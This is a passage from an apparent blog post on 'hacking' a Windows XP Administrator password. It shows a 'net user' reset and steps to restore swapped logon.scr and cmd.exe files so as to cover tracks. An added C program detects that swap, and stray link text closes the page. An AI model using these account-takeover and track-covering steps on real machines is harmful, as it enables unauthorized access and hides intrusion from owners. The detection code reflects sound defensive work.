Example: if the admin user name is clazh and you want to change the password to pass, then type in the following command:
net user clazh pass
This will change the admin password to pass. That's it: you have successfully hacked the Windows XP Administrator password. Now you can log in using the hacked Windows XP Administrator password and do whatever you want to do.
Here are the steps involved to de-hack or restore the Windows XP Administrator password to cover your tracks.
Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands exactly as given:
cd\
cd\ windows\system32\temphack
copy logon.scr C:\windows\system32\logon.scr
copy cmd.exe C:\windows\system32\cmd.exe
exit
Or simply go to C:\windows\system32\temphack, copy the contents of temphack back into the system32 directory and click Yes to overwrite the modified files.
Thanks to internetbusinessdaily.net
Posted By Clazh
Update: Christian Mohn points out this is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.
http://www.scribez.com
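A check for the file swap this post describes, as an added example in C (not part of the original post): it reports when logon.scr is byte-for-byte identical to cmd.exe. The two paths come from the post; the function and verdict names are this example's own assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Paths as they appear in the post; adjust for another install root. */
#define SCR_PATH "C:\\windows\\system32\\logon.scr"
#define CMD_PATH "C:\\windows\\system32\\cmd.exe"

enum scr_verdict { SCR_DIFFERS, SCR_IS_COPY_OF_SHELL, SCR_UNREADABLE };

/* Byte-for-byte comparison.
 * Returns 1 if identical, 0 if different, -1 if a file cannot be read. */
int files_identical(const char *a, const char *b)
{
    FILE *fa = fopen(a, "rb"), *fb = fopen(b, "rb");
    int result = -1;
    if (fa && fb) {
        unsigned char ba[4096], bb[4096];
        size_t na, nb;
        result = 1;
        do {
            na = fread(ba, 1, sizeof ba, fa);
            nb = fread(bb, 1, sizeof bb, fb);
            if (na != nb || memcmp(ba, bb, na) != 0) { result = 0; break; }
        } while (na == sizeof ba);
        if (ferror(fa) || ferror(fb))
            result = -1;
    }
    if (fa) fclose(fa);
    if (fb) fclose(fb);
    return result;
}

/* Classify the screen saver binary against the command interpreter. */
enum scr_verdict check_logon_scr(const char *scr, const char *cmd)
{
    switch (files_identical(scr, cmd)) {
    case 1:  return SCR_IS_COPY_OF_SHELL;  /* the swap described above */
    case 0:  return SCR_DIFFERS;           /* not a copy of cmd.exe */
    default: return SCR_UNREADABLE;        /* missing file: investigate */
    }
}

int main(void)
{
    static const char *msg[] = { "logon.scr differs from cmd.exe",
        "ALERT: logon.scr is a copy of cmd.exe", "logon.scr or cmd.exe unreadable" };
    puts(msg[check_logon_scr(SCR_PATH, CMD_PATH)]);
    return 0;
}
```

A leftover temphack directory under system32 is a second indicator of the same change, and comparing logon.scr against a known-good baseline also catches replacements other than cmd.exe.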

caller ip

softwares download